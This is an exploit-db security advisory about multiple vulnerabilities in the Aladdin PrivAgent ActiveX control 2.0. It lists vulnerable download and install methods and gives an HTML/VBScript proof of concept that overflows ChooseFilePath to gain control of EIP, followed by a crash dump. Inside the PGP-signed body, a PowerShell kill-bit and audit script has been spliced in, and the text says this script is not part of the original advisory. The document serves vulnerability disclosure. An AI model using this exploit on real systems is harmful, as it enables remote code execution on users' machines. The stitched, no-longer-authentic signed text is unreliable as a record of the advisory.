Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 – Multiple Vulnerabilities

  • Author: shinnai
    Date: 2012-10-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/22258/

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    =============================================================================================
     FILE INFO:
    =============================================================================================
     Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 Multiple Remote Vulnerabilities
    
     File: PrivAgent.ocx
     InternalName: PrivAgentAx
     OriginalFilename: PrivAgent.ocx
     FileVersion: 2.0.0.0
     FileDescription: PrivAgent ActiveX Control
     Product: Privilege
     ProductVersion: 02.0
     Debug: False
     Patched: False
     PreRelease: False
     PrivateBuild: True
     SpecialBuild: False
     Language: English (United States)
     MD5 hash: c96dfc282b6bdc177abd076a9bb94933
    =============================================================================================
     OBJECT SAFETY REPORT:
    =============================================================================================
     CLSID: {09F68A41-2FBE-11D3-8C9D-0008C7D901B6}
     ProgID: PrivAgentAx.PrivAgent.1
     Description: PrivAgent Class
     RegKey Safe for Script: True
     RegKey Safe for Init: True
     Implements IObjectSafety: False
    =============================================================================================
     TESTED ON:
    =============================================================================================
     Windows XP Professional SP3
     Windows 7 Professional SP3
    =============================================================================================
     DOWNLOADABLE FROM:
    =============================================================================================
     ftp://ftp.aladdin.com//pub/privilege/activex2002.zip
    =============================================================================================
     BUG INFO:
    =============================================================================================
     This ocx seems to be really poorly coded. I've found so many errors that I felt too choosy
     (yes Mrs. Elsa Fornero, I AM choosy and I AM proud of it) to test any other method.
     Below there's a list of methods vulnerable to stack-based buffer overflow and insecure file
     download, and a proof of concept which exploits a good old fashioned (or trivial, if you like)
     stack-based buffer overflow, triggered simply by passing to the "ChooseFilePath" method a
     string longer than 268 bytes. In this case, after a memory read exception, we are in full
     control of EIP.
     Here is the list of vulnerable methods; guess which ones are vulnerable to arbitrary
     file download? :)
     
     #1
     Function DownloadLicense (
         ByVal sURL As String,
         ByVal sPath As String,
         ByVal bInstall As Boolean
     ) As Long

     #2
     Function ChooseFilePath (
         ByVal sFileName As String
     ) As String

     #3
     Function InstallLicense (
         ByVal szLicensePath As String
     ) As Long

     #4
     Function InstallPrivilege (
         ByVal szInstFilePath As String
     ) As Long

     #5
     Function DownloadPrivilege (
         ByVal szURL As String,
         ByVal szTargetDir As String,
         ByVal bInstall As Boolean
     ) As Long

     #6
     Function InstallDevExt (
         ByVal szDevExtPath As String
     ) As Long

     #7
     Function DownloadDevExt (
         ByVal szURL As String,
         ByVal szTargetPath As String,
         ByVal bInstall As Boolean
     ) As Long
    =============================================================================================
     PROOF OF CONCEPT:
    =============================================================================================
    
    <html>
     <object classid='clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6' id='test'></object>
    <script language = 'vbscript'>
     buffer= String(268, "A")
     getEIP= unescape("bbbb")
     buffer_2= "CCCCCCCC"
     exception = unescape("%5A%0B%02%10") '0x10020B5A pop ESI-pop-ret from PrivAgent.ocx
     buffer_3= unescape("EEEE" + String(2712, "F"))
    
     test.ChooseFilePath buffer + getEIP + buffer_2 + exception + buffer_3
    </script>
    </html>
    
    =============================================================================================
     CRASH DUMP:
    =============================================================================================
     0:005> g
     WARNING: Continuing a non-continuable exception
     (1138.1304): Access violation - code c0000005 (first chance)
     First chance exceptions are reported before any exception handling.
     This exception may be expected and handled.
     eax=00000000 ebx=076886d8 ecx=00385f70 edx=086dc628 esi=0253cfa4 edi=0253cd24
     eip=62626262 esp=0253cce4 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
     cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
     62626262 ?????
    =============================================================================================
     FIX:
    =============================================================================================
     Set the kill bit for the control's CLSID so Internet Explorer will no longer load the ActiveX control.
    =============================================================================================
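The following PowerShell script is an added example and is not part of shinnai's advisory. It ties together the OBJECT SAFETY REPORT section (the "RegKey Safe for Script/Init" lines come from the control's "Implemented Categories" registry keys) and the FIX section (the kill bit): it first reports what the registry declares about the PrivAgent control, then sets the kill bit in the standard "ActiveX Compatibility" location. The only advisory-specific value is the CLSID; the category GUIDs, the 0x400 flag and the registry paths are the standard Windows ones. It assumes it is run from an elevated PowerShell session on the affected host.

```powershell
# Added example, not part of shinnai's advisory: audit what the registry says about the
# PrivAgent control's safety and apply the kill bit the FIX section recommends.
# Assumptions: run in an elevated PowerShell on the affected Windows host; the category
# GUIDs and kill-bit paths are the standard Windows ones, only the CLSID comes from the advisory.

$Clsid = '{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}'   # PrivAgentAx.PrivAgent.1 (from the advisory)

# Component categories a control registers under "Implemented Categories" to declare itself
# safe; these are what the advisory's "RegKey Safe for Script/Init" lines refer to.
$CatSafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CatSafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'

# Bit in "Compatibility Flags" that tells Internet Explorer never to load the control.
$KillBit = 0x400

function Get-KillBitPaths {
    param([string]$Clsid)
    # Second path covers 32-bit IE on 64-bit Windows; it simply does not exist on 32-bit hosts.
    @(
        "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
        "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    )
}

function Test-ActiveXKillBit {
    param([string]$Clsid)
    foreach ($path in Get-KillBitPaths -Clsid $Clsid) {
        if (-not (Test-Path $path)) { continue }
        $flags = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($flags -and (($flags -band $KillBit) -ne 0)) { return $true }
    }
    return $false
}

function Get-ActiveXSafetyReport {
    param([string]$Clsid)
    $base = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    [pscustomobject]@{
        CLSID            = $Clsid
        Registered       = (Test-Path $base)
        InprocServer32   = (Get-ItemProperty -Path "$base\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
        SafeForScripting = (Test-Path "$base\Implemented Categories\$CatSafeForScripting")
        SafeForInit      = (Test-Path "$base\Implemented Categories\$CatSafeForInit")
        KillBitSet       = (Test-ActiveXKillBit -Clsid $Clsid)
    }
}

function Set-ActiveXKillBit {
    param([string]$Clsid)
    foreach ($path in Get-KillBitPaths -Clsid $Clsid) {
        if (-not (Test-Path (Split-Path -Path $path -Parent))) { continue }   # no Wow6432Node on 32-bit
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        $existing = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        $newFlags = ([int]$existing) -bor $KillBit   # OR in the bit, keep any flags already present
        New-ItemProperty -Path $path -Name 'Compatibility Flags' -PropertyType DWord -Value $newFlags -Force | Out-Null
        Write-Host ("Kill bit set at {0} (Compatibility Flags = 0x{1:X})" -f $path, $newFlags)
    }
}

Write-Host '--- Before ---'
Get-ActiveXSafetyReport -Clsid $Clsid | Format-List
Set-ActiveXKillBit -Clsid $Clsid
Write-Host '--- After ---'
Get-ActiveXSafetyReport -Clsid $Clsid | Format-List
```

The report only covers what the registry declares; the advisory's "Implements IObjectSafety" line would require instantiating the control, which this script deliberately avoids. The kill bit stops Internet Explorer from loading the control but leaves PrivAgent.ocx registered on the host, so unregistering or uninstalling the control remains the complete fix.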
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.9 (MingW32)
    
    iQIcBAEBAgAGBQJQijFXAAoJEJlK/ai8vywm9ooP/RTuGJMOI+t8SABs9y2BSUR4
    oj59/J4zF/Ofw7Id/LN3MHAbqUVXWpUQBtjyjIPPGyAReVacn1lUScVhP11R1bRD
    bXbOUw+BU2pfvSmyFaVPQlLe+T6umHaFrEqpbIhgsJSARD8qOQPpd7crywzQXau0
    fa/kf/tpK1tJ42A5gnCV7UybRb4mfmwcz46UfZY2mMYDPzBYInqZJ8+cAgaih/1k
    bdbti+Cpy9Pj+33I2q1YSnlMGqVjIKqT+FCfdVN1DL03/U/TjAeddcCz6fHxpu+t
    nuLWRrAV3CLrSQtYpluBBjASHer5/KzLFZBPZ8MOi97wA+C2oiOnMPbkNDQfjBn2
    EzXnKn1hKNI20WBb48j3oqohQYAFksOu9MErWLekF/tvVkhywtM1qQFRrQrqLf5c
    xJl0DnbM4RiCOmOiAVYRAwTGhYnSsLUYrytO38JINS3TcdyeoZJrNHXcCzZrJJkl
    xmZ8Yqmq3xmEkPQ6YcEybJrzL9j1cFo4wJEkuggr9kEpgbg34N6oQn631QirEdN2
    WUo9w02Rk4W5Jh637DojUjOru2aBA1aGxM92Db1X445dt+VdYhOUUdQVQC+X9xJm
    o0g8NWQSJtGQgTY/u/ZH8fpAcsGcij23Ktq+gc1ma0Sc5U89b64ny2YFsjWxmhcm
    NH/Cs44PsO755FWU917q
    =WA+e
    -----END PGP SIGNATURE-----